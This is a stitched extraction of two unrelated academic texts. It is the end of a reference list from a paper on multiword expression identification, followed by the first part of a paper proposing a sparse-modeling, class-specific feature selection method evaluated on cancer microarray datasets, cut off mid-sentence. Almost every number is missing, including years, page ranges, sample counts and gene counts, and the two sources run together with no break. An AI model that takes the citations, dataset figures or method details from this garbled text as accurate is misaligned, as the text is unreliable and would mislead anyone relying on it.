multiword expressions: a pilot study in sta- tistical machine translation. in proc. of naacl-hlt, pages – . 
los angeles, california, usa. kenneth church, william gale, patrick hanks, and don- ald hindle. . using statistics in lexical analysis. in uri zernik, editor, lexical acquisition: exploiting on-line resources to build a lexicon, pages – . lawrence erlbaum associates, hillsdale, new jersey, usa. massimiliano ciaramita and yasemin altun. . broad- coverage sense disambiguation and information extrac- tion with a supersense sequence tagger. in proc. of emnlp, pages – . sydney, australia. michael collins. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proc. of emnlp, pages – . philadelphia, pennsylvania, usa. matthieu constant and anthony sigogne. . mwu- aware part-of-speech tagging with a crf model and lexical resources. in proc. of the workshop on multi- word expressions: from parsing and generation to the real world, pages – . portland, oregon, usa. matthieu constant, anthony sigogne, and patrick watrin. . discriminative strategies to integrate multiword expression recognition and parsing. in proc. of acl, pages – . jeju island, korea. paul cook, afsaneh fazly, and suzanne stevenson. . the vnc-tokens dataset. in proc. of mwe, pages – . marrakech, morocco. hal daumé, iii. . practical structured learning tech- niques for natural language processing. ph.d. disserta- tion, university of southern california, los angeles, california, usa. url http://hal .name/docs/ daume thesis.pdf. mona diab and pravin bhutada. . verb noun con- struction mwe token classification. in proc. of mwe, pages – . suntec, singapore. nick c. ellis, rita simpson-vlach, and carson maynard. . formulaic language in native and second lan- guage speakers: psycholinguistics, corpus linguistics, and tesol. tesol quarterly, ( ): – . christiane fellbaum, editor. . wordnet: an elec- tronic lexical database. mit press, cambridge, mas- sachusetts, usa. charles j. fillmore, paul kay, and mary catherine o’connor. . regularity and idiomaticity in gram- matical constructions: the case of ‘let alone’. language, ( ): – . yoav freund and robert e. schapire. . large margin classification using the perceptron algorithm. machine learning, ( ): – . mahmoud ghoneim and mona diab. . multiword expressions in the context of statistical machine trans- lation. in proc. of ijcnlp, pages – . nagoya, japan. kevin gimpel and noah a. smith. . generative models of monolingual and bilingual gappy patterns. in proc. of wmt, pages – . edinburgh, scotland, uk. adele e. goldberg. . constructions: a construction grammar approach to argument structure. university of chicago press, chicago, illinois, usa. adele e. goldberg. . constructions at work: the nature of generalization in language. oxford university press, oxford, uk. edouard grave, guillaume obozinski, and francis bach. . hidden markov tree models for semantic class induction. in proc. of conll, pages – . sofia, bulgaria. spence green, marie-catherine de marneffe, john bauer, and christopher d. manning. . multiword expres- sion identification with tree substitution grammars: a parsing tour de force with french. in proc. of emnlp, pages – . edinburgh, scotland, uk. spence green, marie-catherine de marneffe, and christo- pher d. manning. . parsing models for identify- ing multiword expressions. computational linguistics, ( ): – . 
jan hajič, eva hajičová, jarmila panevová, petr sgall, silvie cinková, eva fučíková, marie mikulová, petr pajas, jan popelka, jiří semecký, jana Šindlerová, jan Štěpánek, josef toman, zdeňka urešová, and zdeněk Žabokrtský. . prague czech-english dependency treebank . . technical report ldc t , linguis- tic data consortium, philadelphia, pennsylvania, usa. url http://www.ldc.upenn.edu/catalog/ catalogentry.jsp?catalogid=ldc t . silvana hartmann, györgy szarvas, and iryna gurevych. . mining multiword terms from wikipedia. in maria teresa pazienza and armando stellato, editors, semi-automatic ontology development. igi global, hershey, pennsylvania, usa. chikara hashimoto and daisuke kawahara. . con- struction of an idiom corpus and its application to id- iom identification based on wsd incorporating idiom- specific features. in proc. of emnlp, pages – . honolulu, hawaii, usa. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in proc. of acl- : hlt, pages – . columbus, ohio. koenraad kuiper, heather mccann, heidi quinn, therese aitchison, and kees van der veer. . said. technical report ldc t , linguistic data consortium, philadelphia, pennsylvania, usa. url http://www.ldc.upenn.edu/catalog/ catalogentry.jsp?catalogid=ldc t . john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilistic models for segmenting and labeling sequence data. in proc. of icml, pages – . percy liang. . semi-supervised learning for nat- ural language. master’s thesis, massachusetts in- stitute of technology, cambridge, massachusetts, usa. url http://people.csail.mit.edu/ pliang/papers/meng-thesis.pdf. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . i. dan melamed. . automatic discovery of non- compositional compounds in parallel data. in proc. of emnlp, pages – . providence, rhode island, usa. george a. miller, claudia leacock, randee tengi, and ross t. bunker. . a semantic concordance. in proc. of hlt, pages – . plainsboro, new jersey, usa. scott miller, jethran guinness, and alex zamanian. . name tagging with word clusters and discriminative training. in proc. of hlt-naacl, pages – . boston, massachusetts, usa. behrang mohit, nathan schneider, rishav bhowmick, ke- mal oflazer, and noah a. smith. . recall-oriented learning of named entities in arabic wikipedia. in proc. of eacl, pages – . avignon, france. begona villada moirón and jörg tiedemann. . iden- tifying idiomatic expressions using automatic word- alignment. in proc. of the eacl workshop on multi-word expressions in a multilingual context, pages – . trento, italy. rosamund moon. . fixed expressions and idioms in english: a corpus-based approach. oxford stud- ies in lexicography and lexicology. clarendon press, oxford, uk. david newman, nagendra koilada, jey han lau, and timothy baldwin. . bayesian text segmentation for index term identification and keyphrase extraction. in proc. of coling , pages – . mumbai, india. geoffrey nunberg, ivan a. sag, and thomas wasow. . idioms. language, ( ): – . olutobi owoputi, brendan o’connor, chris dyer, kevin gimpel, nathan schneider, and noah a. smith. . improved part-of-speech tagging for online conversa- tional text with word clusters. in proc. of naacl-hlt, pages – . atlanta, georgia, usa. gerhard paaß and frank reichartz. . exploiting semantic constraints for estimating supersenses with crfs. in proc. 
of the ninth siam international confer- ence on data mining, pages – . sparks, nevada, usa. pavel pecina. . lexical association measures and collocation extraction. language resources and evalu- ation, ( ): – . carlos ramisch. . a generic and open framework for multiword expressions treatment: from acquisition to applications. ph.d. disser- tation, university of grenoble and federal uni- versity of rio grande do sul, grenoble, france. url http://www.inf.ufrgs.br/~ceramisch/ download_files/thesis-getalp.pdf. carlos ramisch, vitor de araujo, and aline villavicencio. . a broad evaluation of techniques for automatic acquisition of multiword expressions. in proc. of acl student research workshop, pages – . jeju is- land, korea. carlos ramisch, aline villavicencio, and christian boitet. . mwetoolkit: a framework for multiword expres- sion identification. in proc. of lrec, pages – . valletta, malta. lance a. ramshaw and mitchell p. marcus. . text chunking using transformation-based learning. in proc. of the third acl workshop on very large corpora, pages – . cambridge, massachusetts, usa. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in proc. of conll, pages – . boulder, colorado, usa. marta recasens and eduard hovy. . blanc: im- plementing the rand index for coreference evaluation. natural language engineering, ( ): – . alan ritter, sam clark, mausam, and oren etzioni. . named entity recognition in tweets: an experimental study. in proc. of emnlp, pages – . edin- burgh, scotland, uk. ivan sag, timothy baldwin, francis bond, ann copes- take, and dan flickinger. . multiword expressions: a pain in the neck for nlp. in alexander gelbukh, editor, computational linguistics and intelligent text processing, volume of lecture notes in computer science, pages – . springer, berlin, germany. nathan schneider, spencer onuffer, nora kazour, emily danchik, michael t. mordowanec, henrietta conrad, and noah a. smith. . comprehensive annotation of multiword expressions in a social web corpus. in proc. of lrec. reykjavík, iceland. yutaro shigeto, ai azuma, sorami hisamoto, shuhei kondo, tomoya kouse, keisuke sakaguchi, akifumi yoshimoto, frances yung, and yuji matsumoto. . construction of english mwe dictionary and its appli- cation to pos tagging. in proc. of the th workshop on multiword expressions, pages – . atlanta, georgia, usa. james w. thatcher. . characterizing derivation trees of context-free grammars through a generalization of finite automata theory. journal of computer and system sciences, ( ): – . kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in proc. of hlt-naacl, pages – . edmonton, alberta, canada. yulia tsvetkov and shuly wintner. . extraction of multi-word expressions from small parallel corpora. in coling : posters, pages – . beijing, china. yulia tsvetkov and shuly wintner. . identification of multi-word expressions by combining multiple lin- guistic information sources. in proc. of emnlp, pages – . edinburgh, scotland, uk. yuancheng tu and dan roth. . learning english light verb constructions: contextual or statistical. in proc. of the workshop on multiword expressions: from parsing and generation to the real world, pages – . portland, oregon, usa. yuancheng tu and dan roth. . sorting out the most confusing english phrasal verbs. in proc. of *sem, pages – . montréal, quebec, canada. joseph turian, lev-arie ratinov, and yoshua bengio. . 
word representations: a simple and general method for semi-supervised learning. in proc. of acl, pages – . uppsala, sweden. martin čmejrek, jan cuřín, jan hajič, and jiří havelka. . prague czech-english dependency treebank: resource for structure-based mt. in proc. of eamt, pages – . budapest, hungary. marc vilain, john burger, john aberdeen, dennis con- nolly, and lynette hirschman. . a model-theoretic coreference scoring scheme. in proc. of muc- , pages – . columbia, maryland, usa. veronika vincze. . light verb constructions in the szegedparalellfx english-hungarian parallel corpus. in proc. of lrec. istanbul, turkey. veronika vincze, istván nagy t., and jános zsibrita. . learning to detect english and hungarian light verb constructions. acm transactions on speech and lan- guage processing, ( ): : – : . submitted may accepted october published november corresponding author davide nardone, davide.nardone@live.it academic editor tzung-pei hong additional information and declarations can be found on page doi . /peerj-cs. copyright nardone et al. distributed under creative commons cc-by . open access a sparse-modeling based approach for class specific feature selection davide nardone, angelo ciaramella and antonino staiano dipartimento di scienze e tecnologie, università degli studi di napoli ‘‘parthenope’’, naples, italy abstract in this work, we propose a novel feature selection framework called sparse-modeling based approach for class specific feature selection (smba-csfs), that simultaneously exploits the idea of sparse modeling and class-specific feature selection. feature selection plays a key role in several fields (e.g., computational biology), making it possible to treat models with fewer variables which, in turn, are easier to explain, by providing valuable insights on the importance of their role, and likely speeding up the experimental validation. unfortunately, also corroborated by the no free lunch theorems, none of the approaches in literature is the most apt to detect the optimal feature subset for building a final model, thus it still represents a challenge. the proposed feature selection procedure conceives a two-step approach: (a) a sparse modeling-based learning technique is first used to find the best subset of features, for each class of a training set; (b) the discovered feature subsets are then fed to a class-specific feature selection scheme, in order to assess the effectiveness of the selected features in classification tasks. to this end, an ensemble of classifiers is built, where each classifier is trained on its own feature subset discovered in the previous phase, and a proper decision rule is adopted to compute the ensemble responses. in order to evaluate the performance of the proposed method, extensive experiments have been performed on publicly available datasets, in particular belonging to the computational biology field where feature selection is indispensable: the acute lymphoblastic leukemia and acute myeloid leukemia, the human carcinomas, the human lung carcinomas, the diffuse large b-cell lymphoma, and the malignant glioma. smba-csfs is able to identify/retrieve the most representative features that maximize the classification accuracy. with top and features, smba-csfs exhibits a promising performance when compared to its competitors from literature, on all considered datasets, especially those with a higher number of features. experiments show that the proposed approach may outperform the state-of-the-art methods when the number of features is high. 
for this reason, the introduced approach proposes itself for selection and classification of data with a large number of features and classes. subjects bioinformatics, data mining and machine learning, data science keywords feature selection, sparse coding, bioinformatics, dictionary learning, ensemble learning introduction data analysis is the process of evaluating data, that is often subject to high-dimensional feature spaces, i.e., where data are represented in, whatever the area of study, from biology to pattern recognition to computer vision. high dimensionality often translates into how to cite this article nardone d, ciaramella a, staiano a. . a sparse-modeling based approach for class specific feature selec- tion. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:davide.nardone@live.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. over-fitting, large computational costs and poor performance thus getting a learning task in trouble. consequently, high-dimensional feature spaces need to be lowered since its feature vectors are generally uninformative, redundant, correlated to each other and also noisy. in this paper, we focus on feature selection, which is undertaken to identify discriminative features by eliminating the ones with little or no predictive information, based on certain criteria, in order to treat with data in low dimensional spaces. feature selection (fs) is the process of selecting a subset of relevant features to use in model construction. fs plays a key role in computational biology, for instance, microarray data analysis involves a huge number of genes with respect to (w.r.t.) a small number of samples, and effectively identifying the most significant differentially expressed genes under different conditions is prominent (xiong, fang & zhao, ). the selected genes are very useful in clinical applications such as recognizing diseased profiles (calcagno et al., ; staiano et al., ; di taranto et al., ; camastra, di taranto & staiano, ), nonetheless, because of its high costs, the number of experiments that can be used for classification purposes is usually limited due to the small number of samples compared to the large number of genes in an experiment, that gives rise to the curse of dimensionality problem (friedman, hastie & tibshirani, ), which challenges the classification as well as other data analysis tasks (staiano et al., ; ciaramella et al., ). furthermore, microarray data are usually not immune from several issues, such as sensitivity, accuracy, specificity, reproducibility of results, and noisy data (draghici et al., ). for these reasons, it is unsuitable to use microarray data as they are; however, after several corrections, the relevant genes can be selected by fs approaches, and for instance use real-time pcr (xiong, fang & zhao, ) to validate the results. taking a look at the literature, by googling the keyword ‘‘feature selection’’, one gets lost in an ocean of techniques (the reader may refer to classical reviews in saeys, inza & larrañaga ( ), guyon & elisseeff ( ), hoque, bhattacharyya & kalita ( ) on the topic), often designed to tackle a specific data set. 
the reasons for the abundance of techniques are in the heterogeneity of the available scientific data sets and also by the limitations dictated by no free lunch theorems (wolpert & macready, ), determining the existence of no general-purpose technique which is well suited to a plethora of different kind of data. a typical taxonomy organizes fs techniques (jović, brkić & bogunović, ) in three main categories, namely filter, wrapper and embedded methods, whose belonging algorithms select a single feature subset from a complete list of features. another perspective instead, divides fs techniques in two classes, namely, traditional feature selection (tfs) for all classes (that includes filter, wrapper and embedded methods mentioned so far), and class-specific feature selection (csfs) (fu & wang, ). usually, a tfs algorithm selects one subset of features for all classes although it may be not the best one for some classes, thus leading to undesirable results. differently, a csfs policy permits to select a distinct subset of features for each class, and it can use any traditional feature selector, for choosing, given the set of classes of a classification problem, one distinct grouping of features for each class. depending on the type of the feature selector, the overall process may slightly change. nevertheless, it is worth pointing out that a csfs scheme heavily depends on the use of a specific classifier, while its use should be independent of both the classifier nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the classification step and the feature selector strategy. to this end, a general framework csfs has been proposed in (pineda-bautista, carrasco-ochoa & martınez-trinidad, ) which allows using any traditional feature selector as well as any classifier. in this paper, on the basis of the general framework for csfs, we propose a novel strategy to fs, namely a sparse-modeling based approach for class-specific feature selection, consisting of a two-step procedure. firstly, a sparse modeling based learning technique is used to find the best subset of features for each class of the training set. in doing so, it is assumed that a class is represented by using a subset of features, called representatives, such that each sample in a specific class, can be described as a linear combination of them. secondly, the discovered feature subsets are fed to a class-specific feature selection scheme in order to assess the effectiveness of the selected features in classification tasks. to this end, an ensemble of classifiers is built by training a given classifier, one for each class, on its own feature subset, i.e., the one discovered in the previous step, and a proper decision rule is adopted to compute the ensemble responses. in this way, the dilemma of choosing specific tfs strategy and classifiers in the csfs framework is effectively mitigated. methods the sparse-modeling based approach for class-specific feature selection, is based on the concepts of sparse modeling and class-specific feature selection that need to be properly introduced. sparse modeling fundamentals an active developing field of statistical learning is focused around the notion of sparsity (tibshirani, ; ciaramella & giunta, ). a sparse model (sm) is a model that can be much easier to estimate and interpret than a dense model. the sparsity assumption allows extracting meaningful features from large data sets. 
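to make the notion of sparsity concrete, a minimal sketch follows; it is not part of the original study, it uses scikit-learn's standard lasso on synthetic data, and every name and parameter value in it (e.g., alpha, the chosen indices) is an illustrative assumption only.

    # illustration only: an l1-penalized (lasso) fit on synthetic data,
    # showing how sparsity leaves just a handful of nonzero coefficients.
    import numpy as np
    from sklearn.linear_model import Lasso

    rng = np.random.default_rng(0)
    X = rng.standard_normal((100, 50))          # 100 samples, 50 candidate features
    true_coef = np.zeros(50)
    true_coef[[3, 17, 42]] = [2.0, -1.5, 3.0]   # only three features really matter
    y = X @ true_coef + 0.1 * rng.standard_normal(100)

    model = Lasso(alpha=0.1).fit(X, y)
    selected = np.flatnonzero(model.coef_)       # indices of the features the model keeps
    print("nonzero coefficients at:", selected)

the few surviving nonzero coefficients are precisely the kind of compact, interpretable description of the data that the sparsity assumption is meant to deliver.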
the aim of the first phase of the proposed approach is to use sparse modeling for finding data representatives without any transformation, working directly in the data space. in other words, we wish to find a ranking of the most representative features that best reconstruct the data collection. most approaches are based on an l1-norm regularization, such as lasso (tibshirani, ) and sparse dictionary learning (elhamifar, sapiro & vidal, ). formally, given a set of features in $\mathbb{R}^m$ arranged as columns of a data matrix $X = [x_1, \ldots, x_n]$, the task is to find representative features given a fixed feature space belonging to a collection of data points (see mairal et al., ; aharon, elad & bruckstein, ; engan, aase & husoy, ; jolliffe, ; ramirez, sprechmann & sapiro, ). that task can conveniently be described in the dictionary learning (dl) framework, where the aim is to simultaneously learn a compact dictionary $D = [d_1, \ldots, d_k] \in \mathbb{R}^{m \times k}$ and coefficients $C = [c_1, \ldots, c_n] \in \mathbb{R}^{k \times n}$, with $k \ll n$, that can well represent collections of data points (ciaramella, gianfico & giunta, ). the best representation of the data is obtained by minimizing the following objective function

$$\sum_{i=1}^{n} \| x_i - D c_i \|_2^2 = \| X - DC \|_F^2 \qquad ( )$$

w.r.t. the dictionary $D$ and the coefficient matrix $C$, subject to appropriate constraints. however, the learned dictionary atoms almost never correspond to the original feature space (aharon, elad & bruckstein, ; ramirez, sprechmann & sapiro, ; mairal et al., ). in order to find a subset of features that best represents the entire feature space, the optimization problem in eq. ( ) is reformulated by forcing the dictionary $D$ to be the data matrix $X$ itself (elhamifar, sapiro & vidal, ):

$$\sum_{i=1}^{n} \| x_i - X c_i \|_2^2 = \| X - XC \|_F^2, \qquad ( )$$

where $\| \cdot \|_F$ is the frobenius norm. equation ( ) is minimized w.r.t. the coefficient matrix $C \triangleq [c_1, \ldots, c_n] \in \mathbb{R}^{n \times n}$, subject to additional constraints. in other words, the reconstruction error of each feature component is minimized by linearly combining all the components of the feature space. to choose $k \ll n$ representatives involved in the linear reconstruction of each component in eq. ( ), the following constraint is added to the model

$$\| C \|_{0,q} \le k, \qquad ( )$$

where the mixed $\ell_0/\ell_q$ norm is defined as $\| C \|_{0,q} \triangleq \sum_{i=1}^{n} I(\| c^i \|_q > 0)$, $c^i$ denotes the $i$-th row of $C$, and $I(\cdot)$ denotes the indicator function. in a nutshell, $\| C \|_{0,q}$ counts the number of nonzero rows of $C$. the indices of the nonzero rows of $C$ correspond to the indices of the columns of $X$ which are chosen as the representative features. since the aim is to select $k \ll n$ representative features that can reconstruct each feature of the $X$ matrix up to a fixed error, the optimization problem to solve is

$$\underset{C}{\text{minimize}} \; \| X - XC \|_F^2 \quad \text{subject to} \quad \| C \|_{0,q} \le k, \;\; \mathbf{1}^{\top} C = \mathbf{1}^{\top} \qquad ( )$$

where $\mathbf{1}^{\top} C = \mathbf{1}^{\top}$ is the affine constraint for selecting representatives that are invariant w.r.t. a global translation of the data (as requested by dimensionality reduction methods). this is an np-hard problem, as it implies a combinatorial search over every subset of $k$ columns of $X$. therefore, relaxing the $\ell_0$ to the $\ell_1$ norm, the problem becomes

$$\underset{C}{\text{minimize}} \; \| X - XC \|_F^2 \quad \text{subject to} \quad \| C \|_{1,q} \le \tau, \;\; \mathbf{1}^{\top} C = \mathbf{1}^{\top} \qquad ( )$$

where $\| C \|_{1,q} \triangleq \sum_{i=1}^{n} \| c^i \|_q$ is the sum of the $\ell_q$ norms of the rows of $C$ and $\tau > 0$ is an appropriately chosen parameter. the solution of the optimization in eq. ( ) not only provides the representative features as the nonzero rows of $C$, but also provides information about the ranking of the selected features.
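as a small, self-contained illustration of the relaxed program above, the sketch below states it for $q = 2$ with the cvxpy modelling library and ranks the candidate features by the row norms of the recovered coefficient matrix. it is an assumed, didactic formulation (synthetic data, hypothetical value of τ), not the authors' released code.

    # minimal sketch (assumed, not the authors' implementation) of the relaxed
    # row-sparse selection problem with q = 2, solved with cvxpy.
    import cvxpy as cp
    import numpy as np

    rng = np.random.default_rng(1)
    X = rng.standard_normal((30, 12))            # 30 observations, 12 candidate features (columns)
    n = X.shape[1]
    tau = 4.0                                    # budget on the l_{1,2} norm (hypothetical value)

    C = cp.Variable((n, n))
    objective = cp.Minimize(cp.sum_squares(X - X @ C))
    constraints = [
        cp.sum(cp.norm(C, 2, axis=1)) <= tau,    # ||C||_{1,2} <= tau
        cp.sum(C, axis=0) == np.ones(n),         # affine constraint 1^T C = 1^T
    ]
    cp.Problem(objective, constraints).solve()

    row_norms = np.linalg.norm(C.value, axis=1)  # strength of each candidate feature
    ranking = np.argsort(-row_norms)             # most to least representative
    print("feature ranking:", ranking)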
more precisely, a representative that has a higher ranking takes part in the reconstruction process more than the others; hence, its corresponding row in the optimal coefficient matrix $C$ has many nonzero elements with large values. conversely, a representative with a lower ranking takes part in the reconstruction process less than the others; hence, its corresponding row in $C$ has few nonzero elements with smaller values. thus, the $k$ representative features $x_{i_1}, \ldots, x_{i_k}$ are ranked as $i_1 \ge i_2 \ge \cdots \ge i_k$ whenever the corresponding rows of $C$ satisfy

$$\| c^{i_1} \|_q \ge \| c^{i_2} \|_q \ge \cdots \ge \| c^{i_k} \|_q. \qquad ( )$$

procedure smba
    input:  x, an n × m matrix, where n is the number of observations and m is the number of features;
            θ = {α, δ, ρ, η}, parameters vector
    output: i, set of selected features
    variables initialization
    while ε > δ and t > ρ do
        β^(t+1) ← (xᵀx + ρI)⁻¹(·)
        θ^(t+1) ← s_{λ/ρ}( β^(t+1) + µ^t/ρ )
        µ^(t+1) ← µ^t + ρ ( β^(t+1) − θ^(t+1) )
        ε ← compute_error(β, θ)
    end
    i ← find_representatives(θ, η)

from a practical point of view, the optimization problem in eq. ( ) can be expressed by using lagrange multipliers as

$$\underset{C}{\text{minimize}} \; \| X - XC \|_F^2 + \lambda \| C \|_{1,q} \quad \text{subject to} \quad \mathbf{1}^{\top} C = \mathbf{1}^{\top}. \qquad ( )$$

in practice, the algorithm is implemented using an alternating direction method of multipliers (admm) optimization framework (boyd et al., ). in particular, the features of a given data set are obtained by considering representatives with small pairwise coherence, as in a sparse dictionary learning method. it is worth observing the resemblance with the least absolute shrinkage and selection operator (lasso) (tibshirani, ). the latter is an approach to regression analysis that performs both variable selection and regularization in order to enhance the prediction accuracy and the interpretability of the statistical model it produces. recall that the objective of lasso, in its basic form, is to solve

$$\underset{\beta}{\text{minimize}} \; \frac{1}{2n} \| y - X\beta \|_2^2 \quad \text{subject to} \quad \| \beta \|_1 \le t, \qquad ( )$$

where $y = [y_1, \ldots, y_n]$ is the $n$-dimensional vector of outcomes, $X$ the covariate matrix, $t$ a free parameter that determines the amount of regularization, and $\beta$ the sparse vector to estimate. from eq. ( ), one can observe that a sparse matrix can be estimated as in eq. ( ) by considering $X$ itself as the outcome and adding the affine constraint. in the following, the lasso will also be used for classification tasks, adopting a sigmoid function, as described in the experimental setup.
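because the update rules of the smba procedure are only outlined above, the numpy fragment below shows one standard way an admm scheme for the lagrangian form in eq. ( ) can be organized when $q = 2$: a ridge-type step, a row-wise soft-thresholding step and a dual update. the variable names, the omission of the affine constraint and the parameter values are assumptions made purely for illustration; this is not the authors' released implementation.

    # hedged admm sketch for  min_C ||X - X C||_F^2 + lam * sum_i ||row_i(C)||_2
    # (affine constraint omitted for brevity).
    import numpy as np

    def smba_admm(X, lam=0.5, rho=1.0, n_iter=300, tol=1e-6):
        n = X.shape[1]
        G = X.T @ X                                            # gram matrix of the features
        inv_term = np.linalg.inv(2.0 * G + rho * np.eye(n))    # cached ridge-type inverse
        B = np.zeros((n, n))                                   # analogue of beta in the procedure
        Theta = np.zeros((n, n))                               # analogue of theta (row-sparse copy)
        U = np.zeros((n, n))                                   # scaled dual variable (mu / rho)
        for _ in range(n_iter):
            # quadratic step: exact minimizer of ||X - XB||_F^2 + (rho/2)||B - Theta + U||_F^2
            B = inv_term @ (2.0 * G + rho * (Theta - U))
            # row-wise soft-thresholding, the analogue of the s_{lam/rho} step
            V = B + U
            norms = np.linalg.norm(V, axis=1, keepdims=True)
            shrink = np.maximum(0.0, 1.0 - (lam / rho) / np.maximum(norms, 1e-12))
            Theta_new = shrink * V
            # dual update, the analogue of the mu update
            U = U + B - Theta_new
            if np.linalg.norm(Theta_new - Theta) < tol:        # crude stopping rule
                Theta = Theta_new
                break
            Theta = Theta_new
        row_strength = np.linalg.norm(Theta, axis=1)
        return np.argsort(-row_strength), row_strength         # ranked feature indices, scores

    # toy usage on random data (shapes only, not a real gene-expression matrix)
    X = np.random.default_rng(2).standard_normal((40, 15))
    ranking, scores = smba_admm(X)
    print(ranking[:5])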
algorithm : sparse-modeling based approach for class-specific feature selection
    input:  x = {x_1, ..., x_n}, data set
            y, class labels
            θ, smba parameters
            m, maximum number of features to select
            c, classifier model (e.g., svm, knn, etc.)
            k, number of folds for performing k-fold cross validation
    output: acm, average classification metrics on the k folds
    begin
        x ← data standardization
        x ← class balancing(x) by using smote (chawla et al., )
        x ← random shuffling(x)
        divide x into k folds
        foreach fold k_i of the k folds do
            set the k_i fold as the test set x_test
            use the remaining k−1 folds as the train set x_train
            perform the class-sample separation on the train set x_train
            (note that i is the subset of features selected for each class c_i ∈ x_train)
            foreach x_{c_i} ∈ x_train do
                i = {i_{c_1}, ..., i_{c_c}} ← smba(x_{c_i}, θ)
            end
            for j ← 1 to m do
                build an ensemble classifier e_j = {e_{1,j}, ..., e_{c,j}} using the j-th selected feature ∈ i_{c_i} and the classifier c
                foreach o ∈ x_test do
                    (acm_j) ← use e_j to classify the instance o
                end
                (acm) ← (acm_j)
            end
        end
        (acm) ← average(acm)
    end

a sparse-modeling based approach for class specific feature selection
a general framework for class-specific feature selection (gf-csfs) is described in (pineda-bautista, carrasco-ochoa & martınez-trinidad, ). the proposed sparse-modeling based approach for class-specific feature selection (smba-csfs) tries to
in order to classify a new instance o through nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the ensemble, the natural dimension of o needs to be lowered to the dimension di of the classifier ei,i= ...,c. this way, for determining to which class o belongs to, an ad-hoc majority rule is used: (a) if a classifier outputs the same class for which the features, used for training ei were selected, i.e., the ei output is ci, then o belongs to ci. in case of a tie, i.e., when several classifiers respond ci, a majority vote is needed among all classifiers to determine the class of o. if still a tie occurs, o will belong to the class that received more votes among the tied classes. (b) if no classifier outputs the class whose selected features are used for training ei belongs to the class winning the majority voting. if there is a tie, then o will belong to the class that received more votes among the tied classes. finally, since a recursive tie may occur, in that case, the instance o would be classified as ci by randomly choosing a class among all the tied classes. the algorithm in fig. , illustrates the pseudo-code describing the csfs-smba procedure. basically, it first standardizes, class-balances and shuffles the data set x, then divides it into k folds, assigning the ki-th fold as test set xtest and the remaining k − folds as train set xtrain. the algorithm iteratively performs the task of class-sample separation, to split the sample belonging to different classes xci, on which the algorithm (illustrated in page ) is performed to output the m most representative features for each class (line ). the selected features are first used, one at time, for training an ensemble classifier ej, and later for classifying each instance o belonging to the test set xtest . finally, for all the ensemble models up to m selected features, the algorithm outputs the acm matrix, storing several model evaluation metrics. experimental results in the experiments, the smba-csfs performance have been assessed on nine publicly available microarray data sets. the classifiers used to determine the goodness of the selected feature subsets are a support vector machine (svm) with a linear kernel and parameter c = , a naive bayes, a k-nearest neighbors (knn) using k = , and a decision tree. data sets description in order to validate the introduced approach, a number of data sets exemplifying the typical data processing in the biological field are used in the experiments. in the following, a brief description of all the data sets employed in the experiments. . the allaml data set (golub et al., ) contains in total samples in classes: all and aml, which have and samples, respectively. every sample contains , gene expression values. . the leukemia data set (golub et al., ) contains in total samples in classes: acute lymphoblastic and acute myeloid. it is a modified version of the original allaml data set, where the original baseline genes ( , ) were cut off before further analysis. the number of genes that are used in the binary classification task is , . . the cll_sub_ data set (haslinger et al., ) has gene expressions from high density oligonucleotide arrays containing genetically and clinically distinct subgroups nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of b-cell chronic lymphocytic leukemia (b-cll). the data set consists of , attributes, instances and classes. . 
the glioma data set (nutt et al., ) contains in total samples in classes: cancer glioblastomas, non-cancer glioblastomas, cancer oligodendrogliomas and non-cancer oligodendrogliomas, which have , , , samples, respectively. each sample has , genes. after a preprocessing, the data set has been shrunk to samples and , genes. . the lung data set (bhattacharjee et al., ) contains in total samples in classes: adenocarcinomas, squamous cell lung carcinomas, pulmonary carcinoids, small-cell lung carcinomas and normal lung, with , , , , samples, respectively. the genes with standard deviations smaller than expression units were removed getting a data set with samples and , genes. . the lung_discrete data set (peng, long & ding, ) contains samples in classes where, each sample consists of gene expressions. the cardinalities of each sample in the lung_discrete data set are , , , , , , , respectively. . the dlbcl data set (alizadeh et al., ) is a modified version of the original dlbcl data set. it consists of samples in classes, where each sample is defined by the expression of , genes. the cardinalities of each sample in the dlbcl data set are , , , , , , , , , respectively. . the carcinom data set (su et al., ) contains samples in classes: prostate, bladder/ureter, breast, colorectal, gastroesophagus, kidney, liver, ovary, pancreas, lung adenocarcinomas and lung squamous cell carcinoma, with , , , , , , , , , , samples, respectively. after a preprocessing as described in yang et al. ( ), the data set has been shrunk to samples and , genes. . the gcm data set (ramaswamy et al., ) contains samples in classes: breast, prostate, lung, colorectal, lymphoma, bladder, melanoma, uterus, leukemia, renal, pancreas, ovary, mesothelioma and central nervous system, where each sample consist of , gene expression signatures. the cardinalities of each sample in the data set are , , , , , , , , , , , , , , respectively. all data sets are available at the following data repository (nardone, ciaramella & staiano, a). all the information about the data sets are summarized in table . experiment setup to validate the effectiveness of the smba-csfs model, it has been compared against several tfs and the gf-csfs proposed in pineda-bautista, carrasco-ochoa & martınez-trinidad ( ). smba-csfs is firstly compared against tfs methods and, since the framework in pineda-bautista, carrasco-ochoa & martınez-trinidad ( ) can use any tfs method as base for performing csfs, some experiments using both filter and wrapper methods (injection process) were made. in addition, the accuracy results were also compared against those obtained on the basis of all the features (bsl). the following tfs methods have been chosen for comparing purposes: nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data sets description. size # features # classes allaml , leukemia , cll_sub_ , glioma , lung_c , lung_d dlbcl , carcinom , gcm , • lasso (tibshirani, ): lasso method involves penalizing the absolute size of the regression coefficients and it is usually used for creating parsimonious models in presence of a large number of features. the model implemented is a modified version of the classical lasso, adapted for classification purposes. in particular, in eq. 